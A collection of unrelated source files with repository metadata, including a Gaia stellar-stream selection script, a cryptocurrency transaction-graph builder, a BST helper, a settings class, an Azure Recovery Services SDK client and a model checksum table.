glob = coord.SkyCoord(ra=189.867*u.deg,
dec=-26.744*u.deg,
distance=10.3*u.kpc,
pm_ra_cosdec=-2.752*u.mas/u.yr,
pm_dec=1.762*u.mas/u.yr,
radial_velocity=-92.99*u.km/u.s)
monte = np.random.normal(loc=[10.3, -2.752, 1.762, -92.99],
scale=[0.4738, 0.044, 0.044, 0.22],
size=(100, 4)).T
MCglob = coord.SkyCoord(ra=glob.ra,
dec=glob.dec,
distance=monte[0]*u.kpc,
pm_ra_cosdec=monte[1]*u.mas/u.yr,
pm_dec=monte[2]*u.mas/u.yr,
radial_velocity=monte[3]*u.km/u.s)
# integrate orbits
orbit = utils.integrate_orbit(init=MCglob, total=totaltime, tstep=timestep)
orbit0 = utils.integrate_orbit(init=glob, total=totaltime, tstep=timestep)
orbit_gal = coord.SkyCoord(l=orbit0['l'], b=orbit0['b'], frame=coord.Galactic)
orbit_icrs = coord.SkyCoord(ra=orbit0['ra'],
dec=orbit0['dec'],
distance=orbit0['dist'],
pm_ra_cosdec=orbit0['pmra'],
pm_dec=orbit0['pmdec'], frame=coord.ICRS)
# interpolate orbit as a function of l
x = orbit_gal.l.value
y = np.vstack([orbit_icrs.pm_ra_cosdec.value,
orbit_icrs.pm_dec.value,
orbit_gal.b.value,
orbit_icrs.distance.value,
orbit_icrs.distance.parallax.value])
f = interp1d(x,y, fill_value=[-99,-99,-99,np.inf,-99], bounds_error=False)
# load the (large) query from Gaia
df = pd.read_csv('scratch/ngc4590-ps1e/query-stream-20mag.csv')
df = df[utils.recommended_quality_cut(df)]
sc = coord.SkyCoord(ra=df['ra'].values*u.deg,
dec=df['dec'].values*u.deg,
pm_ra_cosdec=df['pmra'].values*u.mas/u.yr,
pm_dec=df['pmdec'].values*u.mas/u.yr)
sc_gal = sc.transform_to(coord.Galactic)
utils.extinction_correct_photometry(df)
# load the Helmi+18 stars in NGC 3201 (for making CMD)
helmi = pd.read_csv('scratch/ngc4590-ps1e/NGC4590.csv')
utils.extinction_correct_photometry(helmi)
helmi['M_G'] = helmi['g0'] - glob.distance.distmod.value
# cuts based on tolerances around orbit
pmra, pmdec, b, distance, parallax = f(sc_gal.l)
sel = (np.abs(pmra * u.mas/u.yr - sc.pm_ra_cosdec).value / df['pmra_error']) < 2
sel &= (np.abs(pmdec * u.mas/u.yr - sc.pm_dec).value / df['pmdec_error']) < 2
sel &= np.abs(parallax - df['parallax'])/df['parallax_error'] < 3
sel &= np.abs(b * u.deg - sc_gal.b) < 1*u.deg
a = 480
xvar, yvar = ['ra', 'pmdec']
plt.plot(orbit[xvar][a:], orbit[yvar][a:], 'C0', alpha=0.2)
plt.plot(df[xvar][sel], df[yvar][sel], 'C1.')
plt.xlim(160,195);
plt.plot(helmi['bp_rp0'], helmi['M_G'], '.')
plt.plot(df['bp_rp0'][sel], df['M_G'][sel], '.')
plt.xlim(0,2)
plt.ylim(5,-4);
# flag if candidate falls near CMD (Dotter, Fe/H=-1.241, 11.1 Gyr)
iso = utils.isochrone()
df['M_G'] = df['g0'] - coord.Distance(distance*u.kpc).distmod.value
df['cmdflag'] = np.abs(df['bp_rp0'] - iso(df['M_G'])) < 0.1
# select stars that are kinematic candidates
cand_kinematic = df[sel].copy()
cand = cand_kinematic[cand_kinematic['g'] < 15]
cand.set_index('source_id', inplace=True)
cand_kinematic.set_index('source_id', inplace=True)
# helpful info for Terese
cand['coordstring'] = coord.SkyCoord(cand['ra'], cand['dec'], unit='deg').to_string('hmsdms')
cand['johnson_V'] = cand['g'] - (-0.01760 - 0.006860*cand['bp_rp'] - 0.1732*(cand['bp_rp']**2))
# cand.to_csv('data/gjoll-candidates/gjoll-plus-bright.csv')
# cand_kinematic.to_csv('data/gjoll-candidates/all-candidates.csv')
|
[
"30327239+ahriley@users.noreply.github.com"
] |
30327239+ahriley@users.noreply.github.com
|
9f7068ea449afc9c50905e8fa189a76f8acb94aa
|
f9d5bc590bd6c6274d7a6efec0f60cac1d8286b2
|
/assets/coins/amsterdamcoin/amsterdamcoinCreateGraphTransactions.py
|
a689e693577d2f8f8a533124a3483383e58434e2
|
[] |
no_license
|
pr0logas/grepblockBEpython
|
35c83c1bf2114fc9417bedff6cf2a6e2ad2e667e
|
bbeaa290d13d80f993d843c7f1dbbfd373eee332
|
refs/heads/master
| 2022-10-03T23:35:44.600740
| 2020-03-09T08:24:53
| 2020-03-09T08:24:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,308
|
py
|
#:: By GrepBlock.com developers // pr0logas, mrNemo
#:: Modified date: 2019-11-30
#:: Description: This file is a workspace for assetGraph creation.
import sys, time
from datetime import datetime, timedelta
from time import gmtime, strftime
from amsterdamcoin import *
sys.path.append('../../../')
from mongoDB import *
from parseGraphs import parseGraph
db = database
collectionForBlocks = "blocks"
# Init Classes;
PG = parseGraph(assetTicker, fileForTransactions, genesisBlock)
MC = mongoConnection(mongoAuth, db, collectionForBlocks)
# Find Last unixTime value in a working json file;
lU = PG.parseTransactionsFindLastValue()
if lU == 'FileWasEmpty!':
lU = PG.parseTransactionsFindLastValue()
print "Warning, file was empty, init zero params!"
# Find the same but in MongoDB;
lastBlockByUnixTime = MC.findLastBlockTime(collectionForBlocks, lU)
# Last Block value in mongoDB;
findLastBlock = MC.findLastBlock(collectionForBlocks)
# Init Global while vars;
nextDayTime = (datetime.fromtimestamp(float(lU)) + timedelta(hours=24)).strftime('%Y-%m-%d') # Increase 1 day;
sumTxs = 0
nextDayTimeWhileProgress = nextDayTime
whileprogress = lastBlockByUnixTime
while whileprogress <= findLastBlock:
lB = MC.findByBlock(collectionForBlocks, whileprogress)
if lB != []: # This should never happen!
count = len(lB['tx'])
unixTime = lB['time']
reqNum = int(count)
currBlkTime = (datetime.fromtimestamp(unixTime)).strftime('%Y-%m-%d')
timeSet = strftime("%Y-%m-%d %H:%M:%S", gmtime())
# This should never happen. But if the blockchain stopped for more than 24h?
check1 = str(currBlkTime).replace("-", "")
check2 = str(nextDayTimeWhileProgress).replace("-", "")
if int(check1) > int(check2):
print "WARNING! The blockchain STALL has been detected!!!"
printTime = (datetime.fromtimestamp(unixTime)).strftime('%Y-%m-%d')
timeSet = strftime("%Y-%m-%d %H:%M:%S", gmtime())
resJSON = PG.appendNewContentToTxsGraph(sumTxs, unixTime)
resWrite = PG.writeJSONtoFile(resJSON)
if resWrite == 'OK':
print timeSet + " Next day found. Total Transactions: " + str(sumTxs) + " // We at " + str(printTime)
sumTxs = 0
nextDayTimeWhileProgress = (datetime.fromtimestamp(unixTime) + timedelta(hours=24)).strftime('%Y-%m-%d') # Increase 1 day;
else:
print "FATAL!"
sys.exit(1)
elif currBlkTime != nextDayTimeWhileProgress:
sumTxs = (reqNum + sumTxs)
else:
printTime = (datetime.fromtimestamp(unixTime)).strftime('%Y-%m-%d')
timeSet = strftime("%Y-%m-%d %H:%M:%S", gmtime())
resJSON = PG.appendNewContentToTxsGraph(sumTxs, unixTime)
resWrite = PG.writeJSONtoFile(resJSON)
if resWrite == 'OK':
print timeSet + " Next day found. Total Transactions: " + str(sumTxs) + " // We at " + str(printTime)
sumTxs = 0
nextDayTimeWhileProgress = (datetime.fromtimestamp(unixTime) + timedelta(hours=24)).strftime('%Y-%m-%d') # Increase 1 day;
else:
print "FATAL!"
sys.exit(1)
else:
print "FATAL! Something went wrong while counting Transactions Graph!"
sys.exit(1)
whileprogress += 1
# Send new JSON to FE;
PG.sendJSONtoFronend()
timeSet = strftime("%Y-%m-%d %H:%M:%S", gmtime())
print timeSet +" ***JSON copied to FE instance***"
timeSet = strftime("%Y-%m-%d %H:%M:%S", gmtime())
print timeSet +" All tasks were successful."
|
[
"prologas@protonmail.com"
] |
prologas@protonmail.com
|
0ef902b868c00e4a371703abd337f666f56f2c44
|
263018d629a59ff505c81d15a4b9d837a4744fdd
|
/BST/CountRange.py
|
fc6947c8f9f1640f135b6117df6eca5202997df2
|
[] |
no_license
|
soheshdoshi/Ds-Algo
|
599ba2d97e14b896946266d163c028242d5d4a2b
|
a818a67fc18b9c81fdeb999dd0c81c52c0172cc4
|
refs/heads/master
| 2021-06-01T21:14:37.857737
| 2020-06-18T20:04:01
| 2020-06-18T20:04:01
| 254,314,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 347
|
py
|
def countRange(node,B,C,count):
if node:
countRange(node.left,B,C,count)
temp=node.val
if temp>=B and temp<=C:
count[0]+=1
countRange(node.right,B,C,count)
return count
else:
return count
def mySoution(node,B,C):
count=[0]
countRange(node,B,C,count)
return count[0]
|
[
"doshisohesh@gmail.com"
] |
doshisohesh@gmail.com
|
d17c1862380e18d3bd2253b3957060a6e791edab
|
8fbb6fb2090c9861c70c6ffc1c6191b53d7d0c05
|
/lib/settings/settings.py
|
6ed47d3d438bd6653fa4b11addc3b7b2c0527656
|
[] |
no_license
|
carlesm/RomTaStick
|
4992d3bebb1390ad9324d91d5004184c60a3c1af
|
db3ec6f23a8442941edbe4c7dcd71558405ea8a1
|
refs/heads/master
| 2020-05-26T16:25:33.604803
| 2018-03-03T17:45:01
| 2018-03-03T17:45:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,136
|
py
|
import ConfigParser
import os
class Settings(object):
_file_path = '/home/pi/.RomTaStick/settings.json'
_config = None
def __init__(self, file_path='/home/pi/.RomTaStick/settings.json'):
self._file_path = file_path
# Create parent dir
parent_dir = os.path.abspath(os.path.join(self._file_path, os.pardir))
if not os.path.exists(parent_dir):
os.makedirs(parent_dir)
self._config = ConfigParser.RawConfigParser(allow_no_value=True)
def write(self, section, property, value):
if not self._config.has_section(section):
self._config.add_section(section)
self._config.set(section, property, value)
with open(self._file_path, 'wb') as configfile:
self._config.write(configfile)
def read(self, section, property):
try:
self._config.read(self._file_path)
value = self._config.get(section, property)
if value == None:
value = 'None'
return self._config.get(section, property)
except ConfigParser.NoSectionError:
return 'None'
|
[
"gi.grousset@gmail.com"
] |
gi.grousset@gmail.com
|
21e0898ae647bb0582a66d36d3ffd5919e54ca48
|
aa0270b351402e421631ebc8b51e528448302fab
|
/sdk/recoveryservices/azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/activestamp/aio/operations/_resource_guard_proxy_operations.py
|
1e545be7b61f367e25f5c5cc071de4c57a7d1ada
|
[
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
fangchen0601/azure-sdk-for-python
|
d04a22109d0ff8ff209c82e4154b7169b6cb2e53
|
c2e11d6682e368b2f062e714490d2de42e1fed36
|
refs/heads/master
| 2023-05-11T16:53:26.317418
| 2023-05-04T20:02:16
| 2023-05-04T20:02:16
| 300,440,803
| 0
| 0
|
MIT
| 2020-10-16T18:45:29
| 2020-10-01T22:27:56
| null |
UTF-8
|
Python
| false
| false
| 22,106
|
py
|
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union, overload
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._resource_guard_proxy_operations import (
build_delete_request,
build_get_request,
build_put_request,
build_unlock_delete_request,
)
from .._vendor import RecoveryServicesBackupClientMixinABC
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ResourceGuardProxyOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.recoveryservicesbackup.activestamp.aio.RecoveryServicesBackupClient`'s
:attr:`resource_guard_proxy` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace_async
async def get(
self, vault_name: str, resource_group_name: str, resource_guard_proxy_name: str, **kwargs: Any
) -> _models.ResourceGuardProxyBaseResource:
"""Returns ResourceGuardProxy under vault and with the name referenced in request.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGuardProxyBaseResource or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ResourceGuardProxyBaseResource
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2023-02-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.ResourceGuardProxyBaseResource] = kwargs.pop("cls", None)
request = build_get_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
resource_guard_proxy_name=resource_guard_proxy_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("ResourceGuardProxyBaseResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupResourceGuardProxies/{resourceGuardProxyName}"
}
@overload
async def put(
self,
vault_name: str,
resource_group_name: str,
resource_guard_proxy_name: str,
parameters: _models.ResourceGuardProxyBaseResource,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.ResourceGuardProxyBaseResource:
"""Add or Update ResourceGuardProxy under vault
Secures vault critical operations.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:param parameters: Request body for operation. Required.
:type parameters:
~azure.mgmt.recoveryservicesbackup.activestamp.models.ResourceGuardProxyBaseResource
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGuardProxyBaseResource or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ResourceGuardProxyBaseResource
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def put(
self,
vault_name: str,
resource_group_name: str,
resource_guard_proxy_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.ResourceGuardProxyBaseResource:
"""Add or Update ResourceGuardProxy under vault
Secures vault critical operations.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:param parameters: Request body for operation. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGuardProxyBaseResource or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ResourceGuardProxyBaseResource
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def put(
self,
vault_name: str,
resource_group_name: str,
resource_guard_proxy_name: str,
parameters: Union[_models.ResourceGuardProxyBaseResource, IO],
**kwargs: Any
) -> _models.ResourceGuardProxyBaseResource:
"""Add or Update ResourceGuardProxy under vault
Secures vault critical operations.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:param parameters: Request body for operation. Is either a ResourceGuardProxyBaseResource type
or a IO type. Required.
:type parameters:
~azure.mgmt.recoveryservicesbackup.activestamp.models.ResourceGuardProxyBaseResource or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGuardProxyBaseResource or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ResourceGuardProxyBaseResource
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2023-02-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.ResourceGuardProxyBaseResource] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "ResourceGuardProxyBaseResource")
request = build_put_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
resource_guard_proxy_name=resource_guard_proxy_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self.put.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("ResourceGuardProxyBaseResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
put.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupResourceGuardProxies/{resourceGuardProxyName}"
}
@distributed_trace_async
async def delete( # pylint: disable=inconsistent-return-statements
self, vault_name: str, resource_group_name: str, resource_guard_proxy_name: str, **kwargs: Any
) -> None:
"""Delete ResourceGuardProxy under vault.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None or the result of cls(response)
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2023-02-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
resource_guard_proxy_name=resource_guard_proxy_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.delete.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupResourceGuardProxies/{resourceGuardProxyName}"
}
@overload
async def unlock_delete(
self,
vault_name: str,
resource_group_name: str,
resource_guard_proxy_name: str,
parameters: _models.UnlockDeleteRequest,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.UnlockDeleteResponse:
"""Secures delete ResourceGuardProxy operations.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:param parameters: Request body for operation. Required.
:type parameters: ~azure.mgmt.recoveryservicesbackup.activestamp.models.UnlockDeleteRequest
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: UnlockDeleteResponse or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.UnlockDeleteResponse
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def unlock_delete(
self,
vault_name: str,
resource_group_name: str,
resource_guard_proxy_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.UnlockDeleteResponse:
"""Secures delete ResourceGuardProxy operations.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:param parameters: Request body for operation. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: UnlockDeleteResponse or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.UnlockDeleteResponse
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def unlock_delete(
self,
vault_name: str,
resource_group_name: str,
resource_guard_proxy_name: str,
parameters: Union[_models.UnlockDeleteRequest, IO],
**kwargs: Any
) -> _models.UnlockDeleteResponse:
"""Secures delete ResourceGuardProxy operations.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:param parameters: Request body for operation. Is either a UnlockDeleteRequest type or a IO
type. Required.
:type parameters: ~azure.mgmt.recoveryservicesbackup.activestamp.models.UnlockDeleteRequest or
IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: UnlockDeleteResponse or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.UnlockDeleteResponse
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2023-02-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.UnlockDeleteResponse] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "UnlockDeleteRequest")
request = build_unlock_delete_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
resource_guard_proxy_name=resource_guard_proxy_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self.unlock_delete.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("UnlockDeleteResponse", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
unlock_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupResourceGuardProxies/{resourceGuardProxyName}/unlockDelete"
}
|
[
"noreply@github.com"
] |
fangchen0601.noreply@github.com
|
d6965f82ab816e989349999bde7d4957807710c9
|
d5ae279229727da8414006848806304a0a215c05
|
/condition4.py
|
9bda43e978e4e87bf2a60d3e18b2631debf6191d
|
[] |
no_license
|
biroa/edx_python
|
9c425da0c770155bfb0ff1efa4cc8c9cbe1bcd93
|
0b6c70364f282ea6a40b0e83ff85ed45db02b761
|
refs/heads/master
| 2021-01-01T05:16:39.873028
| 2016-05-08T12:38:44
| 2016-05-08T12:38:44
| 58,311,100
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 78
|
py
|
if 6/2:
print('three')
elif 5 :
print('five')
else:
print('zero')
|
[
"adam.biro@gmail.com"
] |
adam.biro@gmail.com
|
da362ac93063d909cd1b9c6aaa965f0e388c36c7
|
d8ce4b82a490fd466e4e557ba1930513bf63ce69
|
/00_raw_data_processing/data_processing_pipeline/02_create_combined_study_table.py
|
cdfb27cb4898005cc285358ae4ccef4aaed0d643
|
[] |
no_license
|
jzhao0802/ferring
|
cbd50bc632cb2a4604249a88aed9a116e9389c7b
|
a01ecc1a42401bc37123b2b75cd24caafe0218fc
|
refs/heads/master
| 2021-09-05T12:17:49.596891
| 2018-01-24T16:03:33
| 2018-01-24T16:03:33
| 119,166,839
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 903
|
py
|
# -*- coding: utf-8 -*-
import pandas as pd
import set_lib_paths
from functools import reduce
import os
def main(data_dir, study_code):
dfs = [pd.read_csv(os.path.join(data_dir, filename)) for filename in os.listdir(data_dir) if '.csv' == filename[-4:] and 'MERGED_COUNT_DATE.csv' not in filename]
merged_df = reduce(lambda x,y: pd.merge(x, y, on='USUBJID', how='outer'), dfs)
pd.DataFrame.to_csv(merged_df, os.path.join(data_dir, 'MERGED_COUNT_DATE.csv'))
if __name__ == '__main__':
output_base_dir = 'F:/Projects/Ferring/data/pre_modelling/Miso-Obs-'
case_study_codes = ['303', '004']
for current_case_study_code in case_study_codes:
#case_study_index = 1
#current_case_study_code = case_study_codes[case_study_index]
output_dir = '%s%s/'%(output_base_dir, current_case_study_code)
main(output_dir, current_case_study_code)
|
[
"Shaun.Gupta@uk.imshealth.com"
] |
Shaun.Gupta@uk.imshealth.com
|
4f4845e3d3c44b24c019c06297e9dabefbfa99da
|
8325a9fced550c0754ea9727429ec88d5e843ff1
|
/gluon/gluoncv2/models/model_store.py
|
f9a7f91324afe907bf1b375410733d8324b58953
|
[
"MIT"
] |
permissive
|
agdyangkang/imgclsmob
|
61de85aa460b01a57a31062c2a7c8c5fae186e73
|
14f212e562bb255d5c27687415fd06dd86c1db6c
|
refs/heads/master
| 2020-05-30T22:47:24.814699
| 2019-05-31T19:55:15
| 2019-05-31T19:55:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 31,306
|
py
|
"""
Model store which provides pretrained models.
"""
__all__ = ['get_model_file']
import os
import zipfile
import logging
from mxnet.gluon.utils import download, check_sha1
_model_sha1 = {name: (error, checksum, repo_release_tag) for name, error, checksum, repo_release_tag in [
('alexnet', '2126', '9cb87ebd09523bec00e10d8ba9abb81a2c632e8b', 'v0.0.108'),
('vgg11', '1176', '95dd287d0eafa05f8c25a780e41c8760acdb7806', 'v0.0.109'),
('vgg13', '1112', 'a0db3c6c854c675e8c83040c35a80da6e5cdf15f', 'v0.0.109'),
('vgg16', '0869', '57a2556f64a7f0851f9764e9305126074334ef2d', 'v0.0.109'),
('vgg19', '0823', '0e2a1e0a9fdeb74dfef9aedd37712ad306627e35', 'v0.0.109'),
('bn_vgg11b', '1057', 'b2d8f382879075193ee128bc7997611462cfda33', 'v0.0.110'),
('bn_vgg13b', '1016', 'f384ff5263d4c79c22b8fc1a2bdc19c31e1b12b9', 'v0.0.110'),
('bn_vgg16b', '0865', 'b5e33db8aaa77e0a1336e5eb218345a2586f5469', 'v0.0.110'),
